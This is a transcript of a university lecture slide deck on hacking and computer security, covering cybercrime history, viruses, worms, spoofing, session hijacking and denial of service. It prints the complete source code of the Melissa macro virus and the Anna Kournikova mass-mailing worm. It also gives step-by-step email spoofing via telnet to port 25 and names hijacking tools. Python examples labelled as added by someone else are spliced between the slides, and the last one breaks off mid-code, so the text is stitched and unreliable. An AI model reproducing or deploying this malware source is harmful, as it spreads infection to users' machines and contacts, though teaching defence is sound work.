Hacking and Computer Viruses for Cyber Security

DrArunSinghChouhan 12 views 71 slides May 01, 2024

About This Presentation

hacking, Computer viruses


Slide Content

Computer Security
GSBA (Zurich): MIS Block
Hacking

Sanjay Goel, School of Business, University at Albany
2
Topics
• Crisis
• Computer Crimes
• Hacker Attacks
• Modes of Computer Security
– Password Security
– Network Security
– Web Security
– Distributed Systems Security
– Database Security

Crisis
• The Internet has grown very fast and security has lagged behind.
• Legions of hackers have emerged because the barrier to entering the hacker club is low.
• It is hard to trace the perpetrator of a cyber attack since real identities are camouflaged.
• It is very hard to track down people because of the ubiquity of the network.
• Large-scale failures of the Internet can have a catastrophic impact on an economy that relies heavily on electronic transactions.

Computer Crime – The Beginning
• In 1988 a "worm program" written by a college student shut down about 10 percent of the computers connected to the Internet. This was the beginning of the era of cyber attacks.
• Today we have about 10,000 reported incidents of cyber attacks, and the number is growing.

Computer Crime – 1994
• A 16-year-old music student called Richard Pryce, better known by the hacker alias Datastream Cowboy, is arrested and charged with breaking into hundreds of computers including those at Griffiss Air Force Base, NASA and the Korean Atomic Research Institute. His online mentor, "Kuji", is never found.
• Also this year, a group directed by Russian hackers broke into the computers of Citibank and transferred more than $10 million from customers' accounts. Eventually, Citibank recovered all but $400,000 of the pilfered money.

Computer Crime – 1995
• In February, Kevin Mitnick is arrested for a second time. He is charged with stealing 20,000 credit card numbers. He eventually spends four years in jail and on his release his parole conditions demand that he avoid contact with computers and mobile phones.
• On November 15, Christopher Pile becomes the first person to be jailed for writing and distributing a computer virus. Mr Pile, who called himself the Black Baron, was sentenced to 18 months in jail.
• The US General Accounting Office reveals that US Defense Department computers sustained 250,000 attacks in 1995.

Computer Crime – 1999
• In March, the Melissa virus goes on the rampage and wreaks havoc with computers worldwide. After a short investigation, the FBI tracks down and arrests the writer of the virus, a 29-year-old New Jersey computer programmer, David L. Smith.
• More than 90 percent of large corporations and government agencies were the victims of computer security breaches in 1999.

Computer Crime – 2000
• In February, some of the most popular websites in the world, such as Amazon and Yahoo, are almost overwhelmed by being flooded with bogus requests for data.
• In May, the ILOVEYOU virus is unleashed and clogs computers worldwide. Over the coming months, variants of the virus are released that manage to catch out companies that didn't do enough to protect themselves.
• In October, Microsoft admits that its corporate network has been hacked and source code for future Windows products has been seen.

Computer Crime – 2002
• In April 2002, computer hackers calling themselves "Deceptive Duo" announced that they had begun their mission of breaking into computer systems to call attention to the vulnerabilities in US national security.
– In subsequent weeks they hacked into 52 web sites and databases including those operated by the US Office of the Secretary of Defense, the Space and Naval Warfare Systems Command, the Defense Logistics Agency, Sandia National Lab, NASA JPL, airlines, banks …

Intrusion Incident Reports
Intrusion incident reports compiled by CERT (source: http://www.cert.org/stats)

Year    Incidents
1988            6
1989          132
1990          252
1991          406
1992          773
1993        1,334
1994        2,340
1995        2,412
1996        2,573
1997        2,134
1998        3,734
1999        9,859
2000       21,756
2001       52,658
2002      100,000
Note: Projected from 3 quarters of data

Why are we vulnerable?
• Increased complexity of the systems
– Large networks with switches, hubs and gateways provide multiple entry points
– Very sophisticated software using millions of lines of code leaves holes for hackers to attack
• Constantly upgrading computer systems and software
– Support staff are not able to keep up with security provisions
– New technology (often not fully tested) adds new risk
• Lack of proper education
– Managers do not realize the vulnerabilities and are not willing to invest in technology that does not directly affect the bottom line
• Dependence on commercial software with known vulnerabilities
– e.g. Microsoft Windows OS and Outlook

VIRUSES

Virus
• Computer viruses are self-replicating software entities that attach themselves parasitically to existing programs.
• The virus spreads by creating a replica of itself and attaching itself to other executable programs to which it has write access.
– A true virus does not spread from machine to machine on its own. It must be passed on to other users via e-mail, infected files/diskettes, programs or shared files.
• The viruses normally consist of two parts
– Replicator: responsible for copying the virus to other executable programs.
– Payload: the action of the virus, which may be benign, such as printing a weird message or playing music, or malicious, such as destroying data or corrupting the hard disk.

Virus
• When a user executes an infected program (an executable file or boot sector), the viral portion of the code typically executes first and then control returns to the original program, which executes normally.
• Unless the virus executes a payload which the user observes, the user is not likely to find the virus operating on his/her hard drive.
• Viruses can persist in your programs for a long time without being detected, thus constantly upgrading your virus signatures and running virus scans is very important.

Virus
• Polymorphic viruses
– Viruses which modify themselves prior to attaching themselves to another program.
– These are hard to detect since they are constantly changing their signature.
• Macro Viruses
– These viruses use an application macro language (such as VB or VBScript) to create programs that infect documents and templates.
– If an infected document is opened the virus is executed and it infects the user's application templates.

Melissa Virus
// Melissa Virus Source Code
Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> ""
Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 -1): Options.VirusProtection = (1 -1):
Options.SaveNormalPrompt = (1 -1)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo"
Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = "Important Message From " &
Application.UserName
BreakUmOffASlice.Body = "Here is that document you asked for ... don't
show anyone else ;-)"
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapiName.Logoff
End If
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\",
"Melissa?") = "... by Kwyjibo"
End If
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then _
ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If
If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then _
NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo CYA
If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = ""
ADI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = ""
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
CYA:
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") =
False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True: End If
'WORD/Melissa written by Kwyjibo
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!
If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus
triple-word-score, plus fifty points for using all my letters. Game's over.
I'm outta here."
End Sub

Worms
• Worms are a form of self-replicating programs that can automatically spread.
– Unlike viruses they do not need a carrier program and they replicate by spawning copies of themselves.
– They are more complex and are much harder to write than virus programs.
• The ILOVEYOU worm in 2000 automatically emailed itself to the first 200 entries in the Outlook address book
– The worm spread to 10 million computers in the two days it took to create a patch for it
– It cost billions of dollars to repair the damage
• Sometimes worms take a long time to spread
– The Anna Kournikova worm was discovered in August 2000 and became a serious threat in February 2001
• Code Red, Nimda and SirCam are other worms, each of which cost upwards of 500 million dollars in damages

Worm (Anna Kournikova)
'Vbs.OnTheFly Created By OnTheFly
On Error Resume Next
Set WScriptShell = CreateObject("WScript.Shell")
WScriptShell.regwrite "HKCU \software\OnTheFly\", "Worm made with Vbswg 1.50b"
Set FileSystemObject = Createobject("scripting.filesystemobject")
FileSystemObject.copyfile wscript.scriptfullname,FileSystemObject.GetSpecialFolder(0) & " \AnnaKournikova.jpg.vbs"
if WScriptShell.regread ("HKCU \software\OnTheFly\mailed") <> "1" then
doMail()
end if
if month(now) = 1 and day(now) = 26 then
WScriptShell.run "Http://www.dynabyte.nl",3,false
end if
Set thisScript = FileSystemObject.opentextfile(wscript.scriptfullname, 1)
thisScriptText = thisScript.readall
thisScript.Close
Do
If Not (FileSystemObject.fileexists(wscript.scriptfullname)) Then
Set newFile = FileSystemObject.createtextfile(wscript.scriptfullname, True)
newFile.write thisScriptText
newFile.Close
End If
Loop
Function doMail()
On Error Resume Next
Set OutlookApp = CreateObject("Outlook.Application")
If OutlookApp = "Outlook" Then
Set MAPINameSpace = OutlookApp.GetNameSpace("MAPI")
Set AddressLists = MAPINameSpace.AddressLists
For Each address In AddressLists
If address.AddressEntries.Count <> 0 Then
entryCount = address.AddressEntries.Count
For i = 1 To entryCount
Set newItem = OutlookApp.CreateItem(0)
Set currentAddress = address.AddressEntries(i)
newItem.To = currentAddress.Address
newItem.Subject = "Here you have, ;o)"
newItem.Body = "Hi:" & vbcrlf & "Check This!" & vbcrlf & ""
set attachments = newItem.Attachments
attachments.Add FileSystemObject.GetSpecialFolder(0) & " \AnnaKournikova.jpg.vbs"
newItem.DeleteAfterSubmit = True
If newItem.To <> "" Then
newItem.Send
WScriptShell.regwrite "HKCU \software\OnTheFly\mailed", "1"
End If
Next
End If
Next
end if
End Function

Trojan Horse
• This is a program that secretly gets installed on a computer, planting a secret payload that can allow the hacker who planted it access to do things such as stealing passwords or recording keystrokes and transmitting them to a third party
• A logic bomb is a trojan horse that executes when certain conditions become true
– Most commonly executes at a specific date and time
• Example: the Cute Trojan Horse allows hackers to destroy the firewalls installed on computers.

HACKERS

Why do Hackers Attack?
• Most hackers try to test the system limitations out of intellectual curiosity & bragging rights
• Cyber criminals hack into corporate computers to steal money or credit card numbers
– In March 2001 the FBI reported that over 1 million credit card numbers were stolen by cyber criminals in Russia & Ukraine
• Cyber terrorists try to push their political agenda by coercion via computer-based attacks against computers and networks
– NATO computers were blasted with infected emails to protest against bombings in Kosovo during the 1999 conflict
– Lucent was made a target for DOS attacks by a group protesting against its business with Israel
• Disgruntled employees often vent anger at a company or organization by hacking & stealing information or causing damage to computer systems

Types of Hacker Attack
• Active Attacks
– Denial of Service
– Breaking into a site
  • Intelligence Gathering
  • Resource Usage
  • Deception
• Passive Attacks
– Sniffing
  • Passwords
  • Network Traffic
  • Sensitive Information
– Information Gathering

Modes of Hacker Attack
• Spoofing
• Session Hijacking
• Denial of Service Attacks
• Buffer Overflow Attacks
• Password Attacks

Spoofing
Definition:
An attacker alters his identity so that someone thinks he is someone else
– Email, User ID, IP Address, …
– Attacker exploits the trust relation between user and networked machines to gain access to machines
Types of Spoofing:
1. IP Spoofing
2. Email Spoofing
3. Web Spoofing

IP Spoofing
• There are three basic flavors of IP spoofing attacks
– Basic Address Change
– Use of source routing to intercept packets
– Exploiting a trust relationship on UNIX machines

IP Spoofing – Basic Address Change
Definition:
Attacker uses the IP address of another computer to acquire information or gain access
[Diagram: the attacker (10.10.50.50) sends a packet with From Address 10.10.20.30 and To Address 10.10.5.5 to John (10.10.5.5); replies are sent back to the spoofed address 10.10.20.30]
• Attacker changes his own IP address to the spoofed address
• Attacker can send messages to a machine masquerading as the spoofed machine
• Attacker can not receive messages from that machine

Basic Address Change (Windows)
• Simple Mechanism
– From the Start menu select Settings, then Control Panel
– Double click on the Network icon
– Right click the LAN connection and select Properties
– Select Internet Protocol (TCP/IP) and click on Properties
– Change the IP address to the address you want to spoof
– Reboot the machine
– All packets sent from the machine have the spoofed address

Basic Address Change (Unix)
• Use the ifconfig command
– Write Details

IP Spoofing (Basic Address Change)
• Limitation
– Flying blind attack, i.e. the user can not get return messages
– Any protocol which requires a 3-way connection can not be used
– UDP, which is connectionless, can be used to send packets
• Uses
– Used in denial-of-service attacks where a single packet can crash a machine

IP Spoofing – Basic Address Change
• Prevention
– You can protect your machines from being used to launch a spoofing attack
– You can do little to prevent other people from spoofing your address
• Users can be prevented from having access to network configuration
• To protect your company from spoofing attacks you can apply basic filters at your routers
– Ingress Filtering: prevents packets from outside coming in with an address from inside.
– Egress Filtering: prevents packets not having an internal address from leaving the network
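The two router filters on this slide, expressed as a small Python check over constructed sample packets. This is an added example and not part of the slides; it reuses the 10.10.x.x addresses from the diagrams, while the internal block 10.10.0.0/16, the packet dictionary layout and the function names are assumptions made here.

```python
import ipaddress

# Assumed for this example: the company's internal address block.
INTERNAL_NET = ipaddress.ip_network("10.10.0.0/16")


def ingress_allowed(src_ip: str, internal=INTERNAL_NET) -> bool:
    """Ingress filter: a packet arriving from outside must not claim an
    internal source address. Returns True if the packet may enter."""
    return ipaddress.ip_address(src_ip) not in internal


def egress_allowed(src_ip: str, internal=INTERNAL_NET) -> bool:
    """Egress filter: a packet leaving the network must carry an internal
    source address; otherwise an inside host is spoofing someone else's."""
    return ipaddress.ip_address(src_ip) in internal


def apply_filters(packets, internal=INTERNAL_NET):
    """Run each packet through the filter for its direction and return a list
    of (packet, verdict) pairs. A packet is a dict with keys 'direction'
    ('in' or 'out'), 'src' and 'dst'."""
    results = []
    for pkt in packets:
        if pkt["direction"] == "in":
            ok = ingress_allowed(pkt["src"], internal)
        else:
            ok = egress_allowed(pkt["src"], internal)
        results.append((pkt, "pass" if ok else "drop"))
    return results


# Constructed sample traffic (not captured data).
SAMPLE_PACKETS = [
    # Ordinary inbound packet from an external host: passes ingress.
    {"direction": "in", "src": "203.0.113.7", "dst": "10.10.5.5"},
    # Inbound packet claiming an internal source: spoofed, ingress drops it.
    {"direction": "in", "src": "10.10.20.30", "dst": "10.10.5.5"},
    # Ordinary outbound packet from an inside host: passes egress.
    {"direction": "out", "src": "10.10.50.50", "dst": "198.51.100.9"},
    # Outbound packet with a foreign source: inside host spoofing, egress drops it.
    {"direction": "out", "src": "192.0.2.44", "dst": "198.51.100.9"},
]

if __name__ == "__main__":
    for pkt, verdict in apply_filters(SAMPLE_PACKETS):
        print(f"{pkt['direction']:>3} src={pkt['src']:<14} -> {verdict}")
```

Ingress filtering protects you from outsiders pretending to be your own hosts; egress filtering is what stops your own machines from being used to launch a spoofing attack against others, which is the half of the problem the slide says you can actually control.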

IP Spoofing – Source Routing
Definition:
Attacker spoofs the address of another machine and inserts itself between the attacked machine and the spoofed machine to intercept replies
[Diagram: the attacker (10.10.50.50) sends a packet with From Address 10.10.20.30 and To Address 10.10.5.5 to John (10.10.5.5); replies are sent back to 10.10.20.30 and the attacker intercepts them as they go to 10.10.20.30]
• The path a packet takes can vary over time

IP Spoofing – Source Routing contd.
• Attacker uses source routing to ensure that the packets pass through certain nodes on the network
– Loose Source Routing (LSR): The sender specifies a list of addresses that the packet must go through but it can go to any other address if it needs to.
– Strict Source Routing (SSR): The sender specifies the exact path for the packet and the packet is dropped if the exact path can not be taken.
• Source routing works by using a 39-byte source route option field in the IP header
– Works by picking one node address at a time sequentially
– A maximum of 9 nodes in the path can be specified
• Source routing was introduced into the TCP spec for debugging and testing redundancy in the network

IP Spoofing – Source Routing contd.
• Tracert: Windows NT utility that runs at a Command prompt.
• Traces a path from your machine to the URL or IP address given along with the tracert command.
• Usage:
– tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name
– Options:
  • -d              Do not resolve addresses to hostnames.
  • -h maximum_hops Maximum number of hops to search for target.
  • -j host-list    Loose source route along host-list.
  • -w timeout      Wait timeout milliseconds for each reply.
• Tracing a URL: tracert www.techadvice.com <enter>
– Tracing route to www.techadvice.com [63.69.55.237]
  over a maximum of 30 hops:
  1 181 ms 160 ms 170 ms border0.Srvf.Rx2.abc [63.69.55.237]
  2 170 ms 170 ms 160 ms 192.168.0.2
  3 .....

IP Spoofing – Source Routing contd.
• Tracing an IP address: tracert 3.1.6.62
• Tracing using loose source routing: tracert -j 3.2.1.44 3.3.1.42
• Protection
– Disable source routing at your routers

IP Spoofing – Trust Relationships
• In UNIX, trust relationships can be set up between multiple machines
– After trust becomes established the user can use the Unix r commands to access resources on different machines
– A .rhosts file is set up on individual machines, or /etc/hosts.equiv is used to set it up at the system level
• A trust relationship is easy to spoof
– If the user realizes that a machine trusts the IP address 10.10.10.5 he can spoof that address and he is allowed access without a password
– The responses go back to the spoofed machine so this is still a flying blind attack.
• Protection
– Do not use trust relations
– Do not allow trust relationships on the Internet and limit them within the company
– Monitor which machines and users can have trust without jeopardizing critical data or function

Email Spoofing
Definition:
Attacker sends messages masquerading as someone else
What can be the repercussions?
Reasons:
• Attackers want to hide their identity while sending messages (sending anonymous emails)
– User sends email to an anonymous e-mailer which sends emails to the intended recipient
• Attacker wants to impersonate someone
– To get someone in trouble
• Social engineering
– Get information by pretending to be someone else

Email Spoofing – Similar Name Account
• Create an account with a similar email address
– [email protected]: A message from this account can perplex the students
– Most mailers have an alias field (this can be used to prescribe any name).
• Example
Class:
I am too sick to come to the class tomorrow so the class is cancelled.
The assignments that were due are now due next week.
Sanjay Goel

Email Spoofing – Similar Name Account
• Protection
– Educating the employees in a corporation to be cautious
– Make sure that the full email address rather than the alias is displayed
– Institute a policy that all official communication be done using company email
– Use PKI where the digital signature of each employee is associated with the email

Email Spoofing – Mail Client
• Modify a mail client
– When email is sent from the user no authentication is performed on the from address
– Attacker can put in any return address he wants to in the mail he sends
• Protection
– Education
– Audit logging
– Looking at the full email address

Email Spoofing – Telnet to Port 25
• Telnet to port 25
– Most mail servers use port 25 for SMTP.
– An attacker runs a port scan and gets the IP address of a machine with port 25 open
– telnet ip-address 25 (command to telnet to port 25)
– Attacker logs on to this port and composes a message for the user.
• Example:
Hello
mail from: spoofed-email-address
Rcpt to: person-sending-mail-to
Data (message you want to send)
Period sign at the end of the message

Email Spoofing – Telnet to Port 25
• Mail relaying is the sending of email to a person on a different domain
• Protection
– Make sure that the recipient's domain is the same as the mail server's
– New SMTP servers disallow mail relaying
– From a remote connection the from and to addresses are from the same domain as the mail server
– Make sure that spoofing and relay filters are configured

Web Spoofing
• Basic
• Man-in-the-Middle Attack
• URL Rewriting
• Tracking State

Web Spoofing – Basic
• No requirement against registering a domain
– Attacker registers a web address matching an entity, e.g. votebush.com, geproducts.com, gesucks.com
• Process
– Hacker sets up a spoofed site
– User goes to the spoofed site
– Clicks on items to order and checks out
– Site prompts the user for credit card information
– Gives the user a cookie
– Puts up a message: "Site experiencing technical difficulty"
– When the user tries back, the spoofed site checks the cookie
– Already has the credit card number, so directs the user to the legitimate site

Web Spoofing – Basic
• Protection
– Use server side certificates
– Certificates are much harder to spoof
– Users need to ensure that the certificates are legitimate before clicking on OK to accept the certificate

Web Spoofing – Man in the Middle Attack
• Man-in-the-Middle Attack
– Attacker acts as a proxy between the web server and the client
– Attacker has to compromise the router or a node through which the relevant traffic flows
• Protection
– Secure the perimeter to prevent compromise of routers

Web Spoofing – URL Rewriting
• URL Rewriting
– Attacker redirects web traffic to another site that is controlled by the attacker
– Attacker writes his own web site address before the legitimate link
– e.g. <A href="http://www.hacker.com/http://www.albany.edu/index.html">
– The user is first directed to the hacker site and then redirected to the actual site
• Protections
– Web browsers should be configured to always show the complete address
– Ensure that the code for the web sites is properly protected at the server end and during transit
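How a link checker (or a user reading the full address, as the slide recommends) tells the real destination of a rewritten link from the familiar address buried inside it, as an added Python example that is not from the slides. It goes slightly beyond the slide's case by also catching a percent-encoded URL hidden in the query string; the function names and the sample links are mine.

```python
import re
from urllib.parse import urlsplit, unquote

# The rewritten link from the slide (used here as constructed input).
REWRITTEN_LINK = "http://www.hacker.com/http://www.albany.edu/index.html"

# A URL that appears somewhere after the real host, i.e. inside path or query.
_EMBEDDED = re.compile(r"https?://([^/?#\s]+)", re.IGNORECASE)


def real_destination(link: str) -> str:
    """The host a browser actually connects to: the authority part of the URL,
    which ends at the first '/' after the scheme. Anything later is just path."""
    return (urlsplit(link).hostname or "").lower()


def embedded_hosts(link: str):
    """Hostnames of any URL nested inside the path or query of `link`.
    Percent-decoding is applied first so 'http%3A%2F%2F...' is caught too."""
    parts = urlsplit(link)
    tail = unquote(parts.path + "?" + parts.query)  # scheme and authority excluded
    return [m.group(1).lower() for m in _EMBEDDED.finditer(tail)]


def check_link(link: str, expected_host: str) -> dict:
    """Classify a link against the host the user believes it points to.
    A link is suspicious when it really goes somewhere else, or when it
    carries another site's URL inside it (the redirect trick on the slide)."""
    actual = real_destination(link)
    nested = embedded_hosts(link)
    return {
        "actual_host": actual,
        "embedded_hosts": nested,
        "suspicious": actual != expected_host.lower() or bool(nested),
    }


if __name__ == "__main__":
    for link in (REWRITTEN_LINK,
                 "https://www.albany.edu/index.html",
                 "http://www.hacker.com/go?u=http%3A%2F%2Fwww.albany.edu%2F"):
        print(link, "->", check_link(link, "www.albany.edu"))
```

The point the slide makes is that `www.albany.edu` being visible in the link proves nothing: `urlsplit` shows the connection goes to `www.hacker.com`, and the familiar name is merely part of the path handed to that server.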

Web Spoofing
• Tracking State
– When a user logs on to a site a persistent authentication is maintained
– This authentication can be stolen for masquerading as the user

Tracking State
• Browsers primarily use the HTTP protocol to communicate
– HTTP is a stateless protocol
– Web sites need to maintain persistent authentication so that the user does not have to authenticate repeatedly
– This authentication can be stolen for masquerading as the user
[Diagram: the Browser sends a Request to the Web Server, which is backed by a Database; the Response flows back to the Browser]

Web Spoofing – Tracking State
• Three types of tracking methods are used:
1. Cookies: a line of text with an ID in the user's cookie file
– Attacker can read the ID from the user's cookie file
2. URL Session Tracking: an id is appended to all the links in the website's web pages.
– Attacker can guess or read this id and masquerade as the user
3. Hidden Form Elements
– ID is hidden in form elements which are not visible to the user
– Hacker can modify these to masquerade as another user

Web Spoofing – Tracking State Cookies
• Cookies are a piece of information that the server passes to the browser and the browser stores on the server
– Set of name value pairs
• Web servers place cookies on user machines with an id to track the users
• Two types of cookies
– Persistent cookies: stored on the hard drive in text format
– Non-persistent cookies: stored in memory and go away after you reboot or turn off the machine
• Attacker gets cookies by:
– Accessing the victim's hard drive
– Guessing ids which different web servers assign

Web Spoofing – Tracking State Cookies
• Protection
– Physical protection of hard drives is the best protection
– Use non-persistent cookies since the hacker has to access and edit memory to get to it.
– Use random, hard to guess IDs

Web Spoofing – Tracking State URL Encoding
• http://www.address.edu:1234/path/subdir/file.ext?query_string
– Service: http
– Host: www.address.edu
– Port: 1234
– /path/subdir/file.ext: resource path on the server
– query_string: additional information that can be passed to the resource
• HTTP allows name value pairs to be passed to the resource
– http://www.test.edu/index.jsp?firstname=sanjay+lastname=goel
• The server can place the id of a customer along with the URL
– http://www.fake.com/ordering/id=928932888329938.823948
• This number can be obtained by guessing or looking over someone's shoulder
– Timeout for the sessions may be a few hours
– User can masquerade as the owner of the id and transact on the web

Web Spoofing – URL Encoding Protection
• Server Side
– Use large, hard to guess identifiers
– Keep the session inactivity time low
• User Side
– Make sure that no one is looking over your shoulder as you browse
– Do not leave terminals unattended
• Use server side certificates
– A server side certificate is a certificate that the server presents to a client to prove identity
– Users should verify the certificates prior to clicking OK on the accept button
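For the cookie protection on the earlier slide (random, hard-to-guess IDs) and the server-side advice here (large identifiers, short inactivity time), an added Python example that is not the slides' own code: a session store that issues IDs from the operating system's random source and expires idle sessions, next to the sequential scheme that makes an id like the one on the previous slide guessable. The 15-minute default, the injectable clock and the class layout are assumptions made here.

```python
import secrets
import time


class SessionStore:
    """Server-side session table with unguessable IDs and an inactivity timeout.

    inactivity_limit is in seconds (15 minutes assumed as the default policy);
    clock is injectable so the timeout can be tested without waiting."""

    def __init__(self, inactivity_limit: int = 15 * 60, clock=time.time):
        self._sessions = {}          # session id -> (user, time of last activity)
        self._limit = inactivity_limit
        self._clock = clock

    def create(self, user: str) -> str:
        # 32 bytes from the OS CSPRNG (256 bits) encoded as a URL-safe string:
        # there is no pattern to guess and nothing to count up from.
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = (user, self._clock())
        return sid

    def lookup(self, sid: str):
        """Return the user owning `sid`, or None if the id is unknown or the
        session sat idle longer than the limit. A hit refreshes the timer."""
        entry = self._sessions.get(sid)
        if entry is None:
            return None
        user, last_seen = entry
        now = self._clock()
        if now - last_seen > self._limit:
            del self._sessions[sid]  # idle too long: the user must log in again
            return None
        self._sessions[sid] = (user, now)
        return user

    def logout(self, sid: str) -> None:
        """Drop the session so a copied id stops working immediately."""
        self._sessions.pop(sid, None)


def sequential_id(previous: int) -> int:
    """The weak scheme the slides warn about: each customer's id is the previous
    one plus one, so seeing any single id reveals its neighbours."""
    return previous + 1


if __name__ == "__main__":
    store = SessionStore()
    sid = store.create("sanjay")
    print("random id :", sid, "->", store.lookup(sid))
    print("weak id   :", sequential_id(928932888329938))
```

Two separate properties matter: the id must be unpredictable (so guessing fails) and short-lived (so an id that is shoulder-surfed or copied from a URL is worthless after a few idle minutes rather than the "few hours" on the previous slide).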

Web Spoofing – Tracking State Cookies
• HTML allows creation of hidden fields in forms
• Developers exploit this to store information for their reference
• ID can be stored as a hidden form field
– <Input Type=Hidden Name="Search" Value="key">
– <Input Type=Hidden Name="id" Value="123429823">
• Protection
– Hard to guess ids
– Short expiry times

Web Spoofing – General Protection
• Disable JavaScript, ActiveX and other scripting languages that execute locally or in the browser
• Make sure that the browser's location line is always visible
• Educate the users
• Make hard to guess session ids
• Use server side certificates
– A server side certificate is a certificate that the server presents to a client to prove identity
– Users should verify the certificates prior to clicking OK on the accept button

Session Hijacking
Definition:
Process of taking over an existing active session
Modus Operandi:
1. User makes a connection to the server by authenticating using his user ID and password.
2. After the users authenticate, they have access to the server as long as the session lasts.
3. Hacker takes the user offline by denial of service
4. Hacker gains access by impersonating the user

Session Hijacking
• Attacker can
– monitor the session
– periodically inject commands into the session
– launch passive and active attacks from the session
[Diagram: Bob telnets to the Server and authenticates; the attacker knocks Bob offline ("Die!") and then tells the Server "Hi! I am Bob"]

Session Hijacking – How Does it Work?
• Attackers exploit sequence numbers to hijack sessions
• Sequence numbers are 32-bit counters used to:
– tell receiving machines the correct order of packets
– tell the sender which packets are received and which are lost
• Receiver and sender have their own sequence numbers
• When two parties communicate the following are needed:
– IP addresses
– Port numbers
– Sequence numbers
• IP addresses and port numbers are easily available, so once the attacker gets the server to accept his guessed sequence numbers he can hijack the session.

Session Hijacking – Programs
• Juggernaut
– Network sniffer that can also be used for hijacking
– Get from http://packetstorm.securify.com
• Hunt
– Can be used to listen, intercept and hijack active sessions on a network
– http://lin.fsid.cvut.cz/~kra/index.html
• TTY Watcher
– Freeware program to monitor and hijack sessions on a single host
– http://www.cerias.purdue.edu
• IP Watcher
– Commercial session hijacking tool based on TTY Watcher
– http://www.engrade.com

Session Hijacking – Protection
• Use encryption
– Prevents the hacker from reading or forging the session's packets
• Use a secure protocol for sensitive work
– E.g. administer remote machines over an encrypted protocol rather than telnet
• Limit incoming connections
• Minimize remote access
• Strong authentication alone is ineffective
– Authentication is performed only at the beginning of the session; the hijacker takes over after it has already succeeded

Denial of Service (DoS) Attack
Definition:
An attack in which a person renders a system unusable, or significantly slows it down for legitimate users, by overloading it so that no one else can use it.
Types:
1. Crashing the system or network
– Send the victim data or packets that cause the system to crash or reboot.
2. Exhausting resources by flooding the system or network with traffic
– Once bandwidth, memory, CPU or connection tables are used up, legitimate users are denied access.
3. Distributed DoS (DDoS) attacks are coordinated denial-of-service attacks launched by several people and/or from many machines at once.

Denial of Service (DoS) Attack
Types:
1. Ping of Death
2. SSPing
3. Land
4. Smurf
5. SYN Flood
6. CPU Hog
7. Win Nuke
8. RPC Locator
9. Jolt2
10. Bubonic
11. Microsoft Incomplete TCP/IP Packet Vulnerability
12. HP Openview Node Manager SNMP DOS Vulnerability
13. Netscreen Firewall DOS Vulnerability
14. Checkpoint Firewall DOS Vulnerability

DoS Attack – Protection
• Robust design
– Create redundant servers
– Distribute servers across different ISPs
• Bandwidth limitations
– Limit the bandwidth available to each protocol (rate limiting)
• Keep systems patched
– Prevents the attacks that crash machines through known bugs
• Run the fewest services possible
– Limits the hacker's options
• Allow only necessary traffic
– Prevents hacked machines from being used as launching pads
• Block IP addresses
– Once under attack, block the attacking source addresses at the firewall; note that flood attacks often spoof their source addresses, so this helps only against sources that are real
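The "block IP addresses once under attack" item above, as an added example that is not part of the original deck: a sliding-window flood detector run over constructed firewall log lines, which marks any source sending more than a threshold of SYNs per second and renders the result as firewall rules. The log format, the threshold and the use of iptables as the enforcement point are assumptions of this example.

```python
"""Added example, not from the original slides: a rate-based flood detector
that turns the "block attacking IP addresses at the firewall" advice into
code and runs it over constructed log lines.  The log format, thresholds and
the iptables rule text are assumptions, not part of the deck."""
import re
from collections import defaultdict, deque

# Assumed firewall log format: "<epoch seconds> <proto> <src ip> -> <dst ip>:<port> <flags>"
LOG_RE = re.compile(r"^(\d+(?:\.\d+)?) (\w+) (\S+) -> (\S+):(\d+) (\S+)$")
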